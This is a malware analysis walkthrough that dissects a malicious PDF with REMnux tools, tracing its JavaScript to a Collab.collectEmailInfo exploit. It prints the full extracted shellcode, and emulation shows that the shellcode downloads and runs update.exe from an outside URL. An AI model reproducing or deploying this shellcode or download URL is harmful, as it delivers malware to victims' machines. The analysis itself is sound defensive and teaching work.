Analysis-of-a-malicious-pdf
Description
I will describe the process of analyzing a malicious PDF file.
$ file pdf3.pdf pdf3.pdf: PDF document, version 1.4 $ pdfinfo pdf3.pdf Error (45188): Illegal character '>' Error: PDF file is damaged - attempting to reconstruct xref table... Title: Keywords: Author: Creator: Scribus 1.3.3.13 Producer: Scribus PDF Library 1.3.3.13 CreationDate: Sat Jul 11 08:11:56 2009 ModDate: Sat Jul 11 08:11:56 2009 Tagged: no Pages: 1 Encrypted: no Page size: 595.28 x 841.89 pts (A4) File size: 57348 bytes Optimized: no PDF version: 1.4
For our analysis, we will need:
- The REMnux distribution (contains all below necessary tools)
- pdfid to identify objects in our PDF file
- pdf-parser to list JavaScript objects
- pdfobjflow to map the relationships between the PDF objects
- jsunpackn to extract JavaScript contained in the PDF file
- SpiderMonkey to run and de-obfuscate the JavaScript
- Libemu/sctest to emulate the shellcode
- command line (to convert our shellcode to various formats)
Identify objects
List objects
Let's first identify the objects contained in the PDF file, with pdfid.
remnux@remnux:~/malware$ pdfid pdf3.pdf PDFiD 0.1.2 pdf3.pdf PDF Header: %PDF-1.4 obj 40 endobj 40 stream 25 endstream 25 xref 1 trailer 1 startxref 1 /Page 1 /Encrypt 0 /ObjStm 0 /JS 3 /JavaScript 4 /AA 0 /OpenAction 0 /AcroForm 1 /JBIG2Decode 0 /RichMedia 0 /Launch 0 /EmbeddedFile 0 /XFA 0 /Colors > 2^24 0
Search for JavaScript
From the above command, we notice that our PDF file contains JavaScript. Let's list the concerned objects:
remnux@remnux:~/malware$ pdf-parser --search=JavaScript pdf3.pdf obj 37 0 Type: Referencing: 34 0 R << /S /JavaScript /JS 34 0 R >> obj 38 0 Type: Referencing: 35 0 R << /S /JavaScript /JS 35 0 R >> obj 39 0 Type: Referencing: 36 0 R << /S /JavaScript /JS 36 0 R >> obj 7 0 Type: Referencing: 40 0 R << /JavaScript 40 0 R >>
Chained JavaScript objects
Let's see how these objects are linked with pdf-parser and pdfobjflow:
remnux@remnux:~/malware$ pdf-parser pdf3.pdf | pdfobjflow remnux@remnux:~/malware$ feh pdfobjflow.png
Here is an extract of the output:
Extract JavaScript
We could use pdf-parser to extract JavaScript code contained in the PDF file. However, as it seems to be split into 3 parts, the easiest is to use jsunpackn.
remnux@remnux:~/malware$ jsunpack-extractjs pdf3.pdf [SNIP] Found JavaScript in 34 0 (44132 bytes) children [] tags [["TAGVAL", "Length", "46 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]] indata = << /Length 46/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamx]Y,q+A�8jyl`U�;B~=6Q>UY|ddo�~�>?~z~ Found JavaScript in 35 0 (265 bytes) children [] tags [["TAGVAL", "Length", "43 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]] indata = << /Length 43/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamxM@E_EfnAfTEr�sF+=Z:K0jvEa[2U{W%iO\- Found JavaScript in 7 0 (0 bytes) children [["JavaScript", "40 0"]] tags [["ENDTAG", "JavaScript", "40 0 R "]] indata = << /JavaScript 40 0 R >> Found JavaScript in 36 0 (214 bytes) children [] tags [["TAGVAL", "Length", "62 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]] indata = << /Length 62/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamx=@_%XuDDH"vH:njO_izi4]�0i2Rj3iShlQY Wrote JavaScript (45564 bytes -- 953 headers / 44611 code) to file pdf3.pdf.out
Jsunpackn confirmed the presence of JavaScript and wrote an output in pdf3.pdf.out. Before we can execute the JavaScript, we must remove jsunpack headers from the output:
Execute JavaScript
Now, let's save the result in a file named pdf3.js and run it with SpiderMonkey.
remnux@remnux:~/malware$ tail -n+18 pdf3.pdf.out > pdf3.js remnux@remnux:~/malware$ js -f /usr/local/etc/def.js -f pdf3.js > pdf3.out
Let's see how it looks like. As shown on the below screenshot, it's an exploit about Collab.collectEmailInfo:
Extract shellcode
Let's extract the shellcode contained in the array sIIxQHCE:
Now, let's remove the quotes and commas:
remnux@remnux:~/malware$ sed "s/[',]//g" temp.unicode > shellcode.unicode
remnux@remnux:~/malware$ more shellcode.unicode %u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7500%u6470%u7461%u2e65%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u762f%u6f69%u6672%u6f6a%u2d6a%u2e32%u6f63%u2f6d%u2f32%u7075%u6164%u6574%u702e%u7068%u693f%u3d64%u0030%u9000
Analyze shellcode
GetEIP
The shellcode needs to locate itself. It does that with the CALL/POP approach:
remnux@remnux:~/malware$ cat shellcode.unicode | unicode2hex-escaped > shellcode.hex remnux@remnux:~/malware$ cat shellcode.hex | sed "s/\\\x//g" | rasm -a x86 -d - | head -n 20 0000 00 push eax 0000 00 push ebx ; cursor+0x3 0000 00 push ecx ; cursor+0x1 0000 00 push edx ; cursor+0x2 0000 00 push esi ; cursor+0x6 0000 00 push edi ; cursor+0x7 0000 00 push ebp ; cursor+0x5 0000 00 pushfd 0000 00 call 0xd ; 1 = 0x0000000d 0000 00 pop ebp 0000 00 sub ebp, 0xd 0000 00 xor eax, eax 0000 00 add eax, [fs:eax+0x30] 0000 00 js 0x25 ; 2 = 0x00000025 0000 00 mov eax, [eax+0xc] 0000 00 mov esi, [eax+0x1c] 0000 00 lodsd 0000 00 mov eax, [eax+0x8] 0000 00 jmp 0x2e ; 3 = 0x0000002e 0000 00 mov eax, [eax+0x34]
Emulate shellcode with libemu
Let's analyze the shellcode with libemu sctest. We first need to convert our shellcode to raw format:
remnux@remnux:~/malware$ cat shellcode.unicode | unicode2raw > shellcode.raw
Now we can use sctest:
remnux@remnux:~/malware$ cat shellcode.raw | sctest -Svs 10000000 > sctest-out.txt remnux@remnux:~/malware$ more sctest-out.txt verbose = 1 cpu error error accessing 0x00000004 not mapped stepcount 32150 DWORD GetTempPathA ( DWORD nBufferLength = 128; LPTSTR lpBuffer = 0x0041715e => = "c:\tmp\"; ) = 7; HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x00417245 => = "URLMON.DLL"; ) = 0x7df20000; FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7df20000 => none; LPCSTR lpProcName = 0x00417250 => = "URLDownloadToFileA"; ) = 0x7df7b0bb; HRESULT URLDownloadToFile ( LPUNKNOWN pCaller = 0x00000000 => none; LPCTSTR szURL = 0x00417278 => = "http://viorfjoj-2.com/2/update.php?id=0"; LPCTSTR szFileName = 0x0041715e => = "c:\tmp\update.exe"; DWORD dwReserved = 0; LPBINDSTATUSCALLBACK lpfnCB = 0; ) = 0; UINT WINAPI WinExec ( LPCSTR lpCmdLine = 0x0041715e => = "c:\tmp\update.exe"; UINT uCmdShow = 5; ) = 32; DWORD GetTempPathA ( DWORD nBufferLength = 128; LPTSTR lpBuffer = 0x0041715e => = "c:\tmp\"; ) = 7; HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x00417245 => = "URLMON.DLL"; ) = 0x7df20000; FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7df20000 => none;
A temporary path (C:\tmp\) is first defined to store the future downloaded file. URLMON.DLL is then loaded and will be used by the URLDownloadToFileA function to download a file from the Internet (http://viorfjoj-2.com/2/update.php?id=0). The downloaded file is saved to c:\tmp\update.exe and executed by WinExec.